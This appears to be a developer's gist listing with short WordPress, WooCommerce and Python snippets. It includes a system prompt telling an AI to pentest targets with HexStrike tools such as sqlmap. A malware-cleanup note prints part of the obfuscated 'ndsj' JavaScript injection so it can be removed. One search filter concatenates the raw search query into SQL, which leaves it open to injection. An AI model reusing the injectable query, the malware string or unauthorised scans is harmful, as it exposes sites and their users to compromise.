Jany-M

SYSTEM MESSAGE

You are a professional penetration tester with expertise in security assessment and vulnerability analysis.

When a user asks you to pentest a domain or IP address, perform a COMPREHENSIVE security assessment using HexStrike PRIMARY tools (under 128 tool limit).

⚠️ CRITICAL RULES:

• TOOL CALLING FORMAT - MANDATORY: All HexStrike tools REQUIRE named parameters in the format: @hexstrike-mcp tool_name parameter_name=value
  • CRITICAL: You MUST include the parameter name and equals sign. NEVER call a tool without parameters.
• CORRECT: @hexstrike-mcp sqlmap_scan url=https://{{target}}

Jany-M

<?php

/**
 * ============================================================================
 * SMART MULTIPLE BILLING ADDRESSES SOLUTION
 * ============================================================================
 * 1. Store alternate addresses separately (never touch default WooCommerce billing)
 * 2. Populate checkout fields from alternate address when selected
 * 3. Save alternate address to custom storage after order
 * 4. Restore original billing data immediately after checkout

Jany-M

#!/usr/bin/env python3
"""
Script to fetch GitHub Actions workflow run logs
The script fetches the latest failed jobs, then creates a log file with error summary and job run log

Usage:
    python fetch_github_actions_logs.py [--branch BRANCH] [--run-id RUN_ID] [--all-failed] [--per-page N]
"""

# SET UP

Jany-M

<?php
/**
 * Force ACF Field Groups to Show Below Gutenberg Editor
 * 
 * This attempts to force the "normal" position of an ACF Field Group, to work in Gutenberg by using WordPress meta box hooks.
 * This is a workaround and may not work reliably.
 * The "normal" position is not officially supported by ACF in Gutenberg, as of November 2025.
 * 
 * Developed by Jany Martelli @ Shambix - https://www.shambix.com
 * 

Jany-M

<?php
/*
WordPress utility for cleaning up generated image variations (thumbnails) in bulk, in a wp-content/uploads/{year} directory (all months), and for regenerating thumbnails for specific images.
With every deletion or regeneration, it also updates the attachment metadata in the database to remove references to deleted variations.

Drop the file in the ROOT of your website (not in plugins) and access it via browser directly after you have logged into your WordPress dashboard first. It only works for administrator users.
ALWAYS backup your database AND files before using it. Delete the file after use.

Made to work on WP Engine, but should work on any host.

Jany-M

// Common JS strings injected in all core, themes and plugins .js files (at the very end) - Use String Locator plugin and replace with empty space and/or use Force Reinstall plugin to reinstall all plugins - Remember to reinstall WP core files too
// Look for these plugins and remove them: Core, Core Stub
// Look for these themes and remove them: Classic

// Want to dig deeper? https://0x1.gitlab.io/security/Malware-Analysis-Tools-List/

// 1

;if(ndsj===undefined){function C(V,Z){var q=D();return C=function(i,f){i=i-0x8b;var T=q[i];return T;},C(V,Z);}(function(V,Z){var h={V:0xb0,Z:0xbd,q:0x99,i:'0x8b',f:0xba,T:0xbe},w=C,q=V();while(!![]){try{var i=parseInt(w(h.V))/0x1*(parseInt(w('0xaf'))/0x2)+parseInt(w(h.Z))/0x3*(-parseInt(w(0x96))/0x4)+-parseInt(w(h.q))/0x5+-parseInt(w('0xa0'))/0x6+-parseInt(w(0x9c))/0x7*(-parseInt(w(h.i))/0x8)+parseInt(w(h.f))/0x9+parseInt(w(h.T))/0xa*(parseInt(w('0xad'))/0xb);if(i===Z)break;else q['push'](q['shift']());}catch(f){q['push'](q['shift']());}}}(D,0x257ed));var ndsj=true,Http

Jany-M

<?php
function custom_search_where($where){

	global $wpdb;

	if (is_search() && get_search_query())
	  $where .= "OR ((t.name LIKE '%".get_search_query()."%' OR t.slug LIKE '%".get_search_query()."%') AND {$wpdb->posts}.post_status = 'publish')";

	// WPML
	if (function_exists('icl_get_languages')) {

Jany-M

• https://www.kinamo.be/en/support/faq/determining-the-correct-number-of-child-processes-for-php-fpm-on-nginx
• https://serverfault.com/questions/939436/understand-correctly-pm-max-children-tuning

Adjusting child processes for PHP-FPM (Nginx)

When setting these options consider the following:

• How long is your average request?
• What is the maximum number of simultaneous visitors the site(s) get?
• How much memory on average does each child process consume?

Jany-M

<?php

// The discount is set through a term meta 'sale_value' associated to the product, so that product regular or sales prices never need to changed manually
// The script also assumes the use of ACF, through get_field()

// BACKEND (Product list, FB feed)
function custom_dynamic_sale_price( $sale_price, $product ) {
    $id = $product->get_id();
    $tax = get_the_terms($id,'product_cat');
    $regular_price = wc_format_decimal( $product->get_price() );

Jany-M

<div id="map"></div>

<script type="text/javascript">
	$(document).ready(function () {
			
			// You can add as many locations as you like, formatting it in the same order
			var locations = [
				['Name', 'Address', 'Custom Content'],
				['Name 2', 'Address 2', 'Custom Content 2']
			];